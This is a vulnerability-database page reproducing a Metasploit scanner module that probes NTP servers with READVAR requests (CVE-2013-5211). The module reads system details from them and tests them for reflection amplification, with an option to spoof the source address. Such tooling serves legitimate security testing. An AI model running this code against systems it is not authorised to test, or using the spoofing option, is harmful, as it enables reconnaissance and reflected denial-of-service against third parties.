Lucene search
+L

NTP Clock Variables Disclosure

🗓️ 18 Oct 2012 23:03:28Reported by Ewerson Guimaraes(Crash) <[email protected]>, Jon Hart <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 60 Views

NTP Clock Variables Disclosure module reads system internal NTP variables, revealing sensitive information like software version, OS version, and peers

Related
Code
ReporterTitlePublishedViews
Family
0day.today
NTP ntpd monlist Query Reflection - Denial of Service
29 Apr 201400:00
zdt
IBM Security Bulletins
Security Bulletin: IBM BladeCenter Advanced Management Module Account Information Exposure (CVE-2013-5211)
14 Apr 202314:32
ibm
IBM Security Bulletins
Security Bulletin: Vyatta 5600 vRouter Software Patches - Release 1801-zb
11 Sep 201917:35
ibm
IBM Security Bulletins
Security Bulletin: Three potential vulnerabilities in IBM GCM16/GCM32 Global Console Managers (CVE-2014-3085, CVE-2014-3081, CVE-2014-3080)
31 Jan 201901:25
ibm
IBM Security Bulletins
Security Bulletin: IBM Flex System Manager (FSM) is affected by security vulnerabilities. (CVE-2013-5772, CVE-2013-5803, CVE-2013-5372, CVE-2013-5780, CVE-2013-5211)
31 Jan 201901:25
ibm
IBM Security Bulletins
Security Bulletin: IBM Flex System Manager (FSM) is affected by vulnerability (CVE-2013-5211)
31 Jan 201901:25
ibm
IBM Security Bulletins
Security Bulletin: Libxml2 vulnerabilities in Network Intrusion Prevention System (CVE-2014-0191, CVE-2013-2877, CVE-2014-3660, CVE-2013-5211)
23 Feb 202219:48
ibm
IBM Security Bulletins
Security Bulletin: The IBM Chassis Management Module (CMM) is affected by a vulnerability in NTP server (CVE-2013-5211)
31 Jan 201901:25
ibm
IBM Security Bulletins
Security Bulletin: NTP vulnerability in Network Intrusion Prevention System (CVE-2013-5211)
23 Feb 202219:48
ibm
IBM Security Bulletins
Security Bulletin: IBM Virtualization Engine TS7700 - The NTP monlist command is enabled (CVE-2013-5211)
18 Jun 201800:09
ibm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::NTP
  include Msf::Auxiliary::DRDoS

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NTP Clock Variables Disclosure',
      'Description'    => %q(
        This module reads the system internal NTP variables. These variables contain
        potentially sensitive information, such as the NTP software version, operating
        system version, peers, and more.
      ),
      'Author'         =>
        [
          'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>', # original Metasploit module
          'Jon Hart <jon_hart[at]rapid7.com>' # UDPScanner version for faster scans
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
          [ 'URL', 'https://www.rapid7.com/db/vulnerabilities/ntp-clock-variables-disclosure/' ]
        ]
      )
    )
  end

  def scanner_process(data, shost, _sport)
    @results[shost] ||= []
    @results[shost] << Rex::Proto::NTP::NTPControl.new.read(data)
  end

  def scan_host(ip)
    if spoofed?
      datastore['ScannerRecvWindow'] = 0
      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
    else
      scanner_send(@probe, ip, datastore['RPORT'])
    end
  end

  def scanner_prescan(batch)
    @results = {}
    print_status("Sending NTP v2 READVAR probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")
    @probe = Rex::Proto::NTP::NTPControl.new
    @probe.version = datastore['VERSION']
    @probe.operation = 2
  end

  def scanner_postscan(_batch)
    @results.keys.each do |k|
      # TODO: check to see if any of the responses are actually NTP before reporting
      report_service(
        host: k,
        proto: 'udp',
        port: rport,
        name: 'ntp',
        info: @results[k].map { |r| r.payload.slice(0,r.payload_size) }.join.inspect
      )

      peer = "#{k}:#{rport}"
      response_map = { @probe => @results[k] }
      vulnerable, proof = prove_amplification(response_map)
      what = 'NTP Mode 6 READVAR DRDoS'
      if vulnerable
        print_good("#{peer} - Vulnerable to #{what}: #{proof}")
        report_vuln(
          host: k,
          port: rport,
          proto: 'udp',
          name: what,
          refs: references
        )
      else
        vprint_status("#{peer} - Not vulnerable to #{what}: #{proof}")
      end
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2022 23:22Current
8.1High risk
Vulners AI Score8.1
CVSS 25
EPSS0.97755
60